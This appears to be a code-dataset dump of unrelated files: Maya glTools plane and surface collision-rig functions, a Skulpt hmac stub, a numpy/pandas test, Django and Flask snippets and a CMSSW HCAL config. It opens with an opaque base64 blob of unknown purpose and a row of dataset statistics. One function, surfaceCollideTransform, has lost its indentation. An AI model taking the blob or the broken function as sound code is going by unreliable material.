Bi2MzEO4MFt8IoTD1gescOt3yqGR0Gl83q/1MvQWQy8/iHOWENtOD3pYTw3hhhVhRyFw5E3WsshV1k7PE/LoUsb5BUrpYBz908LDmI2SSRMUm+6GlyDGHlMAL90PW5243MEUoKHI2uYEjLa60JsVfDyZWyXlop1VExHdKZE/klIRIw2vlAL6kPvQu2YMJ0DRpFoPTPa1Ib31JoIePVZxOpT8mwjghHe8tIACRCnM0gSrRph6JzWLqpUHUkkO0tteKj/VjH6QMDTnu1irrudBwK8iXExnXfSkhhZEYu1TrXLksM1tKXh5KgaChtOw0BvmmmQAWhVLZAq2hcAGSgJeU9Z6yD88TnMJ2krY0agDjZPq2FJh9geigjcg97expkp5HfkYTpW+xIgz1Do6KoVnqLt9IyO0Q7iSp1ewKxN+UktXyHoyJwiDryPjDNHJAMbGBY8DOIX4wbprMZsyC0Y0oVgp9jnVCiOD4jyCa4+vBQlQAJN2yVatmixS8aH6nANjhrEQZBpu9fBVkRgwyYAbv1gJM7W6ZbdReAPO0JDGt/FbCMLEDfC3yKhq3Pg2C6oiUFpG6miIbMLX/GJePwzEMFIn/uGVm/BhAq1PuqBr5iKCrvZaAttZlZlAaTArqAdGUpoUTPftHVYbdFFaFVcyZWa0lHuhlCsn45Xzrzr4AIEOv/b88LMcusJ2C1ywz6SdmP1NlULg+nkatMpqdCpwDHwClDte9rPoNRBf/n7znudMiGZAzU7pLWHVjKB9yVhJSkPuky+js9OWtqC5YYWK6SStOyjk1yrapec8joG2XSJ9YVPR5pT4l2ym5Iu5FGnPBx8s6MVlvE5K3I/J8rG5wQ1Clcnid9MQ9uubTMz/H75rGAS205JTSlDbBTNRCWmrN26iyP7cB8wRmsoak2c7ZhWHeiqZWoxriD0tQmCN0DMQ5w5aW9MKhgP7s/EamgJiBpJSitqMyf5fQc5UotkYUy8/ZG2ohJzkWHWGV/6BQYcSCZ8adeh5EedYEKFpHQ/lKYzTQ9rh0iU06dKuFlCEiD3ZEx0pFiHQrScpeMoBjBOLdIrX7T
jxfbTL1QisAkjzIy1r0Hzy2J/0JZSfXKKdPs2dCdwDUZ9FvEwAZDk5xDV0imog+udEpBrazVpaREJXtaanM4m6oggAIGHA5JMa9aP7w+dsYDxdWzuuo7+eAOViD+9LJOP/yn0PnaLIQW2huk//aZDk3XrPDrICWRG+bxN9UNqOISH6liSkVu/0bFCcv/p3P+TvtKvEzyIY2Mu9XsfrpV77qkVcf0OAjIKIQDiNeHz0O5GfA79wyX6PQstXnI3GELYYWgm5Ex/PCjp1z/Q07oeKScg9Lzrr/7s6+vr57/grz9896ef/uW7H3/+Ja///cff/ebnP+fFb7776YdWfv5r/fbOD7/94x/+9U8//PTTz3+lT3LTO9//8Cv9ns////WTrl1//PmPP/7N+u433/38l/z4d3/44/f/9uMPf69n/fQtf/3tN/8FL5Tvsg==")))) | 1,772 | 10,450 | 0.96661 | 301 | 10,632 | 34.142857 | 0.966777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143315 | 0.001787 | 10,632 | 6 | 10,450 | 1,772 | 0.825026 | 0.013732 | 0 | 0 | 0 | 0.5 | 0.991414 | 0.991414 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
# === tools/collideTransform.py (fsanges/glTools, MIT) ===

import maya.cmds as mc

import glTools.utils.stringUtils
import glTools.utils.surface
import glTools.utils.transform


def sphereCollideTransform():
    pass


def cylinderCollideTransform():
    pass


def planeCollideTransform( targetTransform,
                           collidePlane = None,
                           collideTransform = None,
                           offsetFalloff = None,
                           distanceFalloff = None,
                           distanceAxis = 'XY',
                           prefix = None ):
    '''
    Setup a plane collide transform.
    Setup includes smooth offset falloff, distance falloff and collide weight attributes.
    Collision is based on the +Z axis of the collide plane transform.
    @param targetTransform: Target transform (or locator) that the collide transform will follow.
    @type targetTransform: str
    @param collidePlane: Collision plane transform. If None, create a new renderRect plane.
    @type collidePlane: str or None
    @param collideTransform: Collide transform that will collide with the plane. If None, create a new locator.
    @type collideTransform: str or None
    @param offsetFalloff: Calculate collision offset falloff. Offset falloff is calculated as collision local Z distance.
    @type offsetFalloff: float or None
    @param distanceFalloff: Calculate collision distance falloff. Distance falloff is calculated as collision local XY distance.
    @type distanceFalloff: float or None
    @param distanceAxis: Axes used to calculate the distance falloff ('X', 'Y' or 'XY').
    @type distanceAxis: str
    @param prefix: Naming prefix. If None, extracted from targetTransform.
    @type prefix: str or None
    '''
    # ==========
    # - Checks -
    # ==========

    # Check Target Transforms
    if not mc.objExists(targetTransform):
        raise Exception('Target transform "'+targetTransform+'" does not exist!')
    if not glTools.utils.transform.isTransform(targetTransform):
        raise Exception('Object "'+targetTransform+'" is not a valid transform!')

    # Check Collide Plane
    if collidePlane:
        if not mc.objExists(str(collidePlane)):
            raise Exception('Collide plane "'+collidePlane+'" does not exist!')
        if not glTools.utils.transform.isTransform(collidePlane):
            raise Exception('Object "'+collidePlane+'" is not a valid transform!')

    # Check Collide Transforms
    if collideTransform:
        if not mc.objExists(str(collideTransform)):
            raise Exception('Collide transform "'+collideTransform+'" does not exist!')
        if not glTools.utils.transform.isTransform(collideTransform):
            raise Exception('Object "'+collideTransform+'" is not a valid transform!')

    # Check Distance Axis
    if distanceAxis: distanceAxis = distanceAxis.upper()

    # Check Prefix
    if not prefix: prefix = glTools.utils.stringUtils.stripSuffix(targetTransform)

    # ===================
    # - Build Collision -
    # ===================

    # Build Collide Objects
    if not collideTransform:
        collideTransform = mc.spaceLocator(n=prefix+'_collide_loc')[0]
    if not collidePlane:
        collidePlaneShape = mc.createNode('renderRect')
        collidePlane = mc.listRelatives(collidePlaneShape,p=True)[0]
        collidePlane = mc.rename(collidePlane,prefix+'_collide_plane')

    # Add Collide Attributes
    if not mc.attributeQuery('collideWeight',n=collidePlane,ex=True):
        mc.addAttr(collidePlane,ln='collideWeight',min=0,max=1,dv=1,k=True)

    # Build Collide Nodes
    collideCondition = mc.createNode('condition',n=prefix+'_collide_condition')
    collideBlend = mc.createNode('blendColors',n=prefix+'_collideWeight_blendColors')
    worldToCollide = mc.createNode('vectorProduct',n=prefix+'_worldToCollide_vectorProduct')
    mc.setAttr(worldToCollide+'.operation',4) # Point Matrix Product
    collideToWorld = mc.createNode('vectorProduct',n=prefix+'_collideToWorld_vectorProduct')
    mc.setAttr(collideToWorld+'.operation',4) # Point Matrix Product
    worldToLocal = mc.createNode('vectorProduct',n=prefix+'_worldToLocal_vectorProduct')
    mc.setAttr(worldToLocal+'.operation',4) # Point Matrix Product

    # =========================
    # - Build Collide Network -
    # =========================

    # World To Collide
    mc.connectAttr(collidePlane+'.worldInverseMatrix[0]',worldToCollide+'.matrix',f=True)
    if mc.objExists(targetTransform+'.worldPosition[0]'):
        mc.connectAttr(targetTransform+'.worldPosition[0]',worldToCollide+'.input1',f=True)
    else:
        localToWorld = mc.createNode('vectorProduct',n=prefix+'_localToWorld_vectorProduct')
        mc.setAttr(localToWorld+'.operation',4) # Point Matrix Product
        mc.connectAttr(targetTransform+'.worldMatrix[0]',localToWorld+'.matrix',f=True)
        mc.connectAttr(localToWorld+'.output',worldToCollide+'.input1',f=True)

    # Collide Condition
    mc.connectAttr(worldToCollide+'.outputZ',collideCondition+'.firstTerm',f=True)
    mc.setAttr(collideCondition+'.secondTerm',0)
    mc.setAttr(collideCondition+'.operation',2) # Greater Than
    mc.connectAttr(worldToCollide+'.output',collideCondition+'.colorIfTrue',f=True)
    mc.connectAttr(worldToCollide+'.outputX',collideCondition+'.colorIfFalseR',f=True)
    mc.connectAttr(worldToCollide+'.outputY',collideCondition+'.colorIfFalseG',f=True)
    mc.setAttr(collideCondition+'.colorIfFalseB',0)

    # Collide Weight Blend
    mc.connectAttr(collideCondition+'.outColor',collideBlend+'.color1',f=True)
    mc.connectAttr(worldToCollide+'.output',collideBlend+'.color2',f=True)
    mc.connectAttr(collidePlane+'.collideWeight',collideBlend+'.blender',f=True)

    # Collide To World
    mc.connectAttr(collideBlend+'.output',collideToWorld+'.input1',f=True)
    mc.connectAttr(collidePlane+'.worldMatrix[0]',collideToWorld+'.matrix',f=True)

    # World To Local
    mc.connectAttr(collideToWorld+'.output',worldToLocal+'.input1',f=True)
    mc.connectAttr(collideTransform+'.parentInverseMatrix[0]',worldToLocal+'.matrix',f=True)

    # Connect Output
    mc.connectAttr(worldToLocal+'.output',collideTransform+'.translate',f=True)

    # ============================
    # - Calculate Offset Falloff -
    # ============================

    if offsetFalloff != None:

        # Add Collide Attributes
        if not mc.attributeQuery('offsetFalloff',n=collidePlane,ex=True):
            mc.addAttr(collidePlane,ln='offsetFalloff',min=0,dv=0.5,k=True)

        # Build Nodes
        falloffRemap = mc.createNode('remapValue',n=prefix+'_offsetFalloff_remapValue')
        falloffMult = mc.createNode('multDoubleLinear',n=prefix+'_offsetFalloff_multDoubleLinear')

        # Falloff Remap
        mc.connectAttr(worldToCollide+'.outputZ',falloffRemap+'.inputValue',f=True)
        mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.inputMax',f=True)
        mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.outputMax',f=True)
        mc.connectAttr(collidePlane+'.offsetFalloff',falloffMult+'.input1',f=True)
        mc.setAttr(falloffMult+'.input2',-1)
        mc.connectAttr(falloffMult+'.output',falloffRemap+'.inputMin',f=True)

        # Override Collide Condition
        mc.connectAttr(collidePlane+'.offsetFalloff',collideCondition+'.secondTerm',f=True)
        mc.connectAttr(falloffRemap+'.outValue',collideCondition+'.colorIfFalseB',f=True)

        # Set Offset Falloff
        mc.setAttr(collidePlane+'.offsetFalloff',abs(offsetFalloff))

    # ==============================
    # - Calculate Distance Falloff -
    # ==============================

    if distanceFalloff != None:

        # Add Collide Attributes
        if not mc.attributeQuery('distanceFalloff',n=collidePlane,ex=True):
            mc.addAttr(collidePlane,ln='distanceFalloff',min=0,dv=1,k=True)

        # Distance Remap
        distRemap = mc.createNode('remapValue',n=prefix+'_collideDist_remapValue')
        mc.connectAttr(collidePlane+'.distanceFalloff',distRemap+'.inputMax',f=True)
        mc.setAttr(distRemap+'.outputMin',1)
        mc.setAttr(distRemap+'.outputMax',0)
        mc.setAttr(distRemap+'.inputMin',0)

        # Distance Falloff
        collideDist = mc.createNode('distanceBetween',n=prefix+'_collideDist_distanceBetween')
        if len(distanceAxis) == 1:
            mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
        elif len(distanceAxis) == 2:
            mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
            mc.connectAttr(worldToCollide+'.output'+distanceAxis[1],collideDist+'.point1Y',f=True)
        else:
            raise Exception('Invalid collision distance axis! ('+str(distanceAxis)+')')
        mc.connectAttr(collideDist+'.distance',distRemap+'.inputValue',f=True)

        # Distance Weight
        distMult = mc.createNode('multDoubleLinear',n=prefix+'_distanceWeight_multDoubleLinear')
        mc.connectAttr(collidePlane+'.collideWeight',distMult+'.input1',f=True)
        mc.connectAttr(distRemap+'.outValue',distMult+'.input2',f=True)
        mc.connectAttr(distMult+'.output',collideBlend+'.blender',f=True)

        # Set Distance Falloff
        mc.setAttr(collidePlane+'.distanceFalloff',abs(distanceFalloff))

    # =================
    # - Return Result -
    # =================

    return [collidePlane,collideTransform]
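The node network built by planeCollideTransform amounts to a small piece of vector math: express the target point relative to the plane, clamp its distance along the plane normal (the local +Z) at zero, and blend the collided and uncollided positions by the collide weight. A pure-Python sketch of that math (illustrative only, not part of glTools; it assumes the plane is given by an origin point and a unit normal):

```python
def plane_collide(point, plane_origin, plane_normal, weight=1.0):
    """Clamp a point to the +normal side of a plane, blended by a
    0-1 collide weight (the math the condition/blendColors network
    above encodes). plane_normal is assumed to be unit length."""
    # Signed distance of the point along the plane normal (local Z).
    d = sum((p - o) * n for p, o, n in zip(point, plane_origin, plane_normal))
    if d >= 0.0:
        # Already on the +normal side: no collision.
        return tuple(point)
    # Project the point back onto the plane, then blend the collided
    # and uncollided positions by the collide weight.
    projected = tuple(p - d * n for p, n in zip(point, plane_normal))
    return tuple(weight * c + (1.0 - weight) * p
                 for c, p in zip(projected, point))
```

With weight 1.0 the point is clamped fully onto the plane; with weight 0.0 the collision is disabled, matching the behaviour of the collideWeight attribute above.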
def doublePlaneCollideTransform( targetTransform,
                                 collidePlane1=None,
                                 collidePlane2=None,
                                 collideTransform=None,
                                 offsetFalloff=None,
                                 distanceFalloff=None,
                                 distanceAxis='XY',
                                 prefix=None):
    '''
    Setup a double plane collide transform.
    Setup includes smooth offset falloff, distance falloff and collide weight attributes.
    Collision is based on the +Z axis of each collide plane transform.
    @param targetTransform: Target transform (or locator) that the collide transform will follow.
    @type targetTransform: str
    @param collidePlane1: Collision plane 1 transform. If None, create a new renderRect plane.
    @type collidePlane1: str or None
    @param collidePlane2: Collision plane 2 transform. If None, create a new renderRect plane.
    @type collidePlane2: str or None
    @param collideTransform: Collide transform that will collide with the planes. If None, create a new locator.
    @type collideTransform: str or None
    @param offsetFalloff: Calculate collision offset falloff. Offset falloff is calculated as collision local Z distance.
    @type offsetFalloff: float or None
    @param distanceFalloff: Calculate collision distance falloff. Distance falloff is calculated as collision local XY distance.
    @type distanceFalloff: float or None
    @param distanceAxis: Axes used to calculate the distance falloff ('X', 'Y' or 'XY').
    @type distanceAxis: str
    @param prefix: Naming prefix. If None, extracted from targetTransform.
    @type prefix: str or None
    '''
    # ==========
    # - Checks -
    # ==========

    # Check Target Transform
    if not mc.objExists(targetTransform):
        raise Exception('Target transform "'+targetTransform+'" does not exist!')
    if not glTools.utils.transform.isTransform(targetTransform):
        raise Exception('Object "'+targetTransform+'" is not a valid transform!')

    # Check Collide Transform
    if collideTransform:
        if not mc.objExists(str(collideTransform)):
            raise Exception('Collide transform "'+collideTransform+'" does not exist!')
        if not glTools.utils.transform.isTransform(collideTransform):
            raise Exception('Object "'+collideTransform+'" is not a valid transform!')

    # Check Collide Planes
    for collidePlane in [collidePlane1,collidePlane2]:
        if collidePlane:
            if not mc.objExists(str(collidePlane)):
                raise Exception('Collide plane "'+collidePlane+'" does not exist!')
            if not glTools.utils.transform.isTransform(collidePlane):
                raise Exception('Object "'+collidePlane+'" is not a valid transform!')

    # Check Distance Axis
    if distanceAxis: distanceAxis = distanceAxis.upper()

    # Check Prefix
    if not prefix: prefix = glTools.utils.stringUtils.stripSuffix(targetTransform)

    # ===================
    # - Build Collision -
    # ===================

    # Build Collide Objects
    if not collideTransform:
        collideTransform = mc.spaceLocator(n=prefix+'_collide_loc')[0]
    if not collidePlane1:
        collidePlaneShape = mc.createNode('renderRect')
        collidePlane1 = mc.listRelatives(collidePlaneShape,p=True)[0]
        collidePlane1 = mc.rename(collidePlane1,prefix+'_collide1_plane')
    if not collidePlane2:
        collidePlaneShape = mc.createNode('renderRect')
        collidePlane2 = mc.listRelatives(collidePlaneShape,p=True)[0]
        collidePlane2 = mc.rename(collidePlane2,prefix+'_collide2_plane')

    # Add Collide Attributes
    for collidePlane in [collidePlane1,collidePlane2]:
        if not mc.attributeQuery('collideWeight',n=collidePlane,ex=True):
            mc.addAttr(collidePlane,ln='collideWeight',min=0,max=1,dv=1,k=True)

    # Build Collide Nodes
    # The plane 2 collision is chained after the plane 1 collision, so the
    # target is clamped against both planes in sequence.
    collideCondition1 = mc.createNode('condition',n=prefix+'_collide1_condition')
    collideBlend1 = mc.createNode('blendColors',n=prefix+'_collideWeight1_blendColors')
    worldToCollide1 = mc.createNode('vectorProduct',n=prefix+'_worldToCollide1_vectorProduct')
    mc.setAttr(worldToCollide1+'.operation',4) # Point Matrix Product
    collideToWorld1 = mc.createNode('vectorProduct',n=prefix+'_collideToWorld1_vectorProduct')
    mc.setAttr(collideToWorld1+'.operation',4) # Point Matrix Product
    collideCondition2 = mc.createNode('condition',n=prefix+'_collide2_condition')
    collideBlend2 = mc.createNode('blendColors',n=prefix+'_collideWeight2_blendColors')
    worldToCollide2 = mc.createNode('vectorProduct',n=prefix+'_worldToCollide2_vectorProduct')
    mc.setAttr(worldToCollide2+'.operation',4) # Point Matrix Product
    collideToWorld2 = mc.createNode('vectorProduct',n=prefix+'_collideToWorld2_vectorProduct')
    mc.setAttr(collideToWorld2+'.operation',4) # Point Matrix Product
    worldToLocal = mc.createNode('vectorProduct',n=prefix+'_worldToLocal_vectorProduct')
    mc.setAttr(worldToLocal+'.operation',4) # Point Matrix Product

    # =========================
    # - Build Collide Network -
    # =========================

    # World To Collide (Plane 1)
    mc.connectAttr(collidePlane1+'.worldInverseMatrix[0]',worldToCollide1+'.matrix',f=True)
    if mc.objExists(targetTransform+'.worldPosition[0]'):
        mc.connectAttr(targetTransform+'.worldPosition[0]',worldToCollide1+'.input1',f=True)
    else:
        localToWorld = mc.createNode('vectorProduct',n=prefix+'_localToWorld_vectorProduct')
        mc.setAttr(localToWorld+'.operation',4) # Point Matrix Product
        mc.connectAttr(targetTransform+'.worldMatrix[0]',localToWorld+'.matrix',f=True)
        mc.connectAttr(localToWorld+'.output',worldToCollide1+'.input1',f=True)

    # Collide Condition (Plane 1)
    mc.connectAttr(worldToCollide1+'.outputZ',collideCondition1+'.firstTerm',f=True)
    mc.setAttr(collideCondition1+'.secondTerm',0)
    mc.setAttr(collideCondition1+'.operation',2) # Greater Than
    mc.connectAttr(worldToCollide1+'.output',collideCondition1+'.colorIfTrue',f=True)
    mc.connectAttr(worldToCollide1+'.outputX',collideCondition1+'.colorIfFalseR',f=True)
    mc.connectAttr(worldToCollide1+'.outputY',collideCondition1+'.colorIfFalseG',f=True)
    mc.setAttr(collideCondition1+'.colorIfFalseB',0)

    # Collide Weight Blend (Plane 1)
    mc.connectAttr(collideCondition1+'.outColor',collideBlend1+'.color1',f=True)
    mc.connectAttr(worldToCollide1+'.output',collideBlend1+'.color2',f=True)
    mc.connectAttr(collidePlane1+'.collideWeight',collideBlend1+'.blender',f=True)

    # Collide To World (Plane 1)
    mc.connectAttr(collideBlend1+'.output',collideToWorld1+'.input1',f=True)
    mc.connectAttr(collidePlane1+'.worldMatrix[0]',collideToWorld1+'.matrix',f=True)

    # World To Collide (Plane 2)
    mc.connectAttr(collidePlane2+'.worldInverseMatrix[0]',worldToCollide2+'.matrix',f=True)
    mc.connectAttr(collideToWorld1+'.output',worldToCollide2+'.input1',f=True)

    # Collide Condition (Plane 2)
    mc.connectAttr(worldToCollide2+'.outputZ',collideCondition2+'.firstTerm',f=True)
    mc.setAttr(collideCondition2+'.secondTerm',0)
    mc.setAttr(collideCondition2+'.operation',2) # Greater Than
    mc.connectAttr(worldToCollide2+'.output',collideCondition2+'.colorIfTrue',f=True)
    mc.connectAttr(worldToCollide2+'.outputX',collideCondition2+'.colorIfFalseR',f=True)
    mc.connectAttr(worldToCollide2+'.outputY',collideCondition2+'.colorIfFalseG',f=True)
    mc.setAttr(collideCondition2+'.colorIfFalseB',0)

    # Collide Weight Blend (Plane 2)
    mc.connectAttr(collideCondition2+'.outColor',collideBlend2+'.color1',f=True)
    mc.connectAttr(worldToCollide2+'.output',collideBlend2+'.color2',f=True)
    mc.connectAttr(collidePlane2+'.collideWeight',collideBlend2+'.blender',f=True)

    # Collide To World (Plane 2)
    mc.connectAttr(collideBlend2+'.output',collideToWorld2+'.input1',f=True)
    mc.connectAttr(collidePlane2+'.worldMatrix[0]',collideToWorld2+'.matrix',f=True)

    # World To Local
    mc.connectAttr(collideToWorld2+'.output',worldToLocal+'.input1',f=True)
    mc.connectAttr(collideTransform+'.parentInverseMatrix[0]',worldToLocal+'.matrix',f=True)

    # Connect Output
    mc.connectAttr(worldToLocal+'.output',collideTransform+'.translate',f=True)

    # ============================
    # - Calculate Offset Falloff -
    # ============================
    # NOTE: Offset and distance falloff are applied to the plane 1 collision only.

    if offsetFalloff != None:

        # Add Collide Attributes
        if not mc.attributeQuery('offsetFalloff',n=collidePlane1,ex=True):
            mc.addAttr(collidePlane1,ln='offsetFalloff',min=0,dv=0.5,k=True)

        # Build Nodes
        falloffRemap = mc.createNode('remapValue',n=prefix+'_offsetFalloff_remapValue')
        falloffMult = mc.createNode('multDoubleLinear',n=prefix+'_offsetFalloff_multDoubleLinear')

        # Falloff Remap
        mc.connectAttr(worldToCollide1+'.outputZ',falloffRemap+'.inputValue',f=True)
        mc.connectAttr(collidePlane1+'.offsetFalloff',falloffRemap+'.inputMax',f=True)
        mc.connectAttr(collidePlane1+'.offsetFalloff',falloffRemap+'.outputMax',f=True)
        mc.connectAttr(collidePlane1+'.offsetFalloff',falloffMult+'.input1',f=True)
        mc.setAttr(falloffMult+'.input2',-1)
        mc.connectAttr(falloffMult+'.output',falloffRemap+'.inputMin',f=True)

        # Override Collide Condition
        mc.connectAttr(collidePlane1+'.offsetFalloff',collideCondition1+'.secondTerm',f=True)
        mc.connectAttr(falloffRemap+'.outValue',collideCondition1+'.colorIfFalseB',f=True)

        # Set Offset Falloff
        mc.setAttr(collidePlane1+'.offsetFalloff',abs(offsetFalloff))

    # ==============================
    # - Calculate Distance Falloff -
    # ==============================

    if distanceFalloff != None:

        # Add Collide Attributes
        if not mc.attributeQuery('distanceFalloff',n=collidePlane1,ex=True):
            mc.addAttr(collidePlane1,ln='distanceFalloff',min=0,dv=1,k=True)

        # Distance Remap
        distRemap = mc.createNode('remapValue',n=prefix+'_collideDist_remapValue')
        mc.connectAttr(collidePlane1+'.distanceFalloff',distRemap+'.inputMax',f=True)
        mc.setAttr(distRemap+'.outputMin',1)
        mc.setAttr(distRemap+'.outputMax',0)
        mc.setAttr(distRemap+'.inputMin',0)

        # Distance Falloff
        collideDist = mc.createNode('distanceBetween',n=prefix+'_collideDist_distanceBetween')
        if len(distanceAxis) == 1:
            mc.connectAttr(worldToCollide1+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
        elif len(distanceAxis) == 2:
            mc.connectAttr(worldToCollide1+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
            mc.connectAttr(worldToCollide1+'.output'+distanceAxis[1],collideDist+'.point1Y',f=True)
        else:
            raise Exception('Invalid collision distance axis! ('+str(distanceAxis)+')')
        mc.connectAttr(collideDist+'.distance',distRemap+'.inputValue',f=True)

        # Distance Weight
        distMult = mc.createNode('multDoubleLinear',n=prefix+'_distanceWeight_multDoubleLinear')
        mc.connectAttr(collidePlane1+'.collideWeight',distMult+'.input1',f=True)
        mc.connectAttr(distRemap+'.outValue',distMult+'.input2',f=True)
        mc.connectAttr(distMult+'.output',collideBlend1+'.blender',f=True)

        # Set Distance Falloff
        mc.setAttr(collidePlane1+'.distanceFalloff',abs(distanceFalloff))

    # =================
    # - Return Result -
    # =================

    return [collidePlane1,collidePlane2,collideTransform]
def surfaceCollideTransform(targetTransform,slaveTransform,collideSurface,inside=True,prefix=''):
'''
'''
# ==========
# - Checks -
# ==========
if not mc.objExists(targetTransform):
raise Exception('Target transform "'+targetTransform+'" does not exist!')
if not mc.objExists(slaveTransform):
raise Exception('Slave transform "'+slaveTransform+'" does not exist!')
if not mc.objExists(collideSurface):
raise Exception('Collide surface "'+collideSurface+'" does not exist!')
if not glTools.utils.surface.isSurface(collideSurface):
raise Exception('Collide object "'+collideSurface+'" is not a valid NURBS surface!')
if not prefix: prefix = 'collideSurface'
# ===================
# - Create Locators -
# ===================
slave_loc = mc.spaceLocator(n=slaveTransform+'_loc')[0]
target_loc = mc.spaceLocator(n=targetTransform+'_loc')[0]
target_ptCon = mc.pointConstraint(targetTransform,target_loc)[0]
# - Setup -
con = mc.createNode('condition',n=prefix+'_condition')
vp = mc.createNode('vectorProduct',n=prefix+'_vectorProduct')
pma = mc.createNode('plusMinusAverage',n=prefix+'_plusMinusAverage')
posi = mc.createNode('pointOnSurfaceInfo',n=prefix+'_pointOnSurfaceInfo')
cpos = mc.createNode('closestPointOnSurface',n=prefix+'_closestPointOnSurface')
# Surface Connect
mc.connectAttr(collideSurface+'.worldSpace[0]',posi+'.inputSurface',f=True)
mc.connectAttr(collideSurface+'.worldSpace[0]',cpos+'.inputSurface',f=True)
mc.connectAttr(target_loc+'.worldPosition[0]',cpos+'.inPosition',f=True)
# Parameter Connect
mc.connectAttr(cpos+'.parameterU',posi+'.parameterU',f=True)
mc.connectAttr(cpos+'.parameterV',posi+'.parameterV',f=True)
# Offset Calc
mc.setAttr(pma+'.operation',2) # SUBTRACT
mc.connectAttr(target_loc+'.worldPosition[0]',pma+'.input3D[0]',f=True)
mc.connectAttr(cpos+'.position',pma+'.input3D[1]',f=True)
# Dot Product
mc.setAttr(vp+'.operation',1) # DOT PRODUCT
mc.connectAttr(posi+'.normal',vp+'.input1',f=True)
mc.connectAttr(pma+'.output3D',vp+'.input2',f=True)
# Condition
if inside: mc.setAttr(con+'.operation',2) # Greater Than
else: mc.setAttr(con+'.operation',4) # Less Than
mc.setAttr(con+'.firstTerm',0.0)
mc.connectAttr(vp+'.outputX',con+'.secondTerm',f=True)
mc.connectAttr(target_loc+'.worldPosition[0]',con+'.colorIfTrue',f=True)
mc.connectAttr(cpos+'.position',con+'.colorIfFalse',f=True)
# Output
mc.connectAttr(con+'.outColor',slave_loc+'.t',f=True)
return target_loc, slave_loc
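The condition network above is just a half-space test: the dot product of the surface normal with the offset vector (target position minus closest surface point) tells which side of the surface the target is on. Below is a minimal pure-Python sketch of that decision, with no Maya dependency; `collide_point` is a hypothetical helper for illustration, not part of this module.

```python
def collide_point(target, closest, normal, inside=True):
    """Half-space collision test mirroring the condition node setup.

    Keeps `target` while it is on the allowed side of the surface,
    otherwise snaps it to `closest` (the closest point on the surface).
    """
    # Offset vector from the surface point to the target (plusMinusAverage).
    offset = tuple(t - c for t, c in zip(target, closest))
    # Dot product with the surface normal (vectorProduct, operation=1).
    dot = sum(n * o for n, o in zip(normal, offset))
    # inside=True uses "0 > dot" (Greater Than); inside=False uses
    # "0 < dot" (Less Than), matching the condition node operations.
    allowed = dot < 0.0 if inside else dot > 0.0
    return target if allowed else closest
```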
# ---- src/lib/hmac.py (DTenore/skulpt, MIT) ----
import _sk_fail; _sk_fail._("hmac")
# ---- tests/test_utils.py (sladkovm/Velometria.py, MIT) ----
import numpy as np
import pandas as pd
from vmpy.utils import cast_array_to_original_type
def test_cast_array_to_original_type():
arg = [0, 0, 0]
rv = cast_array_to_original_type(np.array(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(pd.Series(arg), type(arg))
assert type(rv) == type(arg)
arg = np.array([0, 0, 0])
rv = cast_array_to_original_type(list(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(pd.Series(arg), type(arg))
assert type(rv) == type(arg)
arg = pd.Series([0, 0, 0])
rv = cast_array_to_original_type(list(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(np.array(arg), type(arg))
    assert type(rv) == type(arg)
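The helper under test, `cast_array_to_original_type`, is not shown in this chunk. Below is a hypothetical sketch of its contract (convert a sequence back to its original container type), restricted to built-in containers so it stays self-contained; the real vmpy helper also handles `numpy.ndarray` and `pandas.Series`.

```python
def cast_array_to_original_type(arr, output_type):
    # Hypothetical sketch of the vmpy helper: rebuild `arr` as the
    # container type it originally had. Built-in containers only here.
    if output_type is list:
        return list(arr)
    if output_type is tuple:
        return tuple(arr)
    raise TypeError("Unsupported output type: %r" % output_type)
```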
# ---- submission_form/models/__init__.py (NAKKA-K/degifarm, MIT) ----
from submission_form.models.info import *
from submission_form.models.user import *
from submission_form.models.task import *
# ---- RecoLocalCalo/HcalRecProducers/python/HBHEStatusBitSetter_cfi.py (ckamtsikis/cmssw, Apache-2.0) ----
import FWCore.ParameterSet.Config as cms
qie8Config = cms.PSet(nominalPedestal=cms.double(3.0), #fC
hitEnergyMinimum=cms.double(1.0), #GeV
hitMultiplicityThreshold=cms.int32(17),
pulseShapeParameterSets = cms.VPSet(
cms.PSet(pulseShapeParameters=cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15)),
cms.PSet(pulseShapeParameters=cms.vdouble( 100.0, 2.0e3, -50.0, 0.0, -5.0, 0.05)),
cms.PSet(pulseShapeParameters=cms.vdouble( 2.0e3, 1.0e6, -50.0, 0.0, 95.0, 0.0 )),
cms.PSet(pulseShapeParameters=cms.vdouble(-1.0e6, 1.0e6, 45.0, 0.1, 1.0e6, 0.0 )),
)
)
# For now, QIE11 parameters duplicate those of QIE8. To be tuned.
qie11Config = cms.PSet(nominalPedestal=cms.double(3.0), #fC
hitEnergyMinimum=cms.double(1.0), #GeV
hitMultiplicityThreshold=cms.int32(17),
pulseShapeParameterSets = cms.VPSet(
cms.PSet(pulseShapeParameters=cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15)),
cms.PSet(pulseShapeParameters=cms.vdouble( 100.0, 2.0e3, -50.0, 0.0, -5.0, 0.05)),
cms.PSet(pulseShapeParameters=cms.vdouble( 2.0e3, 1.0e6, -50.0, 0.0, 95.0, 0.0 )),
cms.PSet(pulseShapeParameters=cms.vdouble(-1.0e6, 1.0e6, 45.0, 0.1, 1.0e6, 0.0 )),
)
)
# ---- runp.py (Zyntab/npc, MIT) ----
#! /usr/bin/python
from app import app
# NOTE: db, User and Character are undefined in the original file; assuming
# the common Flask layout (db in app/__init__.py, models in app/models.py):
from app import db
from app.models import User, Character
@app.shell_context_processor
def make_shell_context():
    return {'db': db, 'User': User, 'Character': Character}
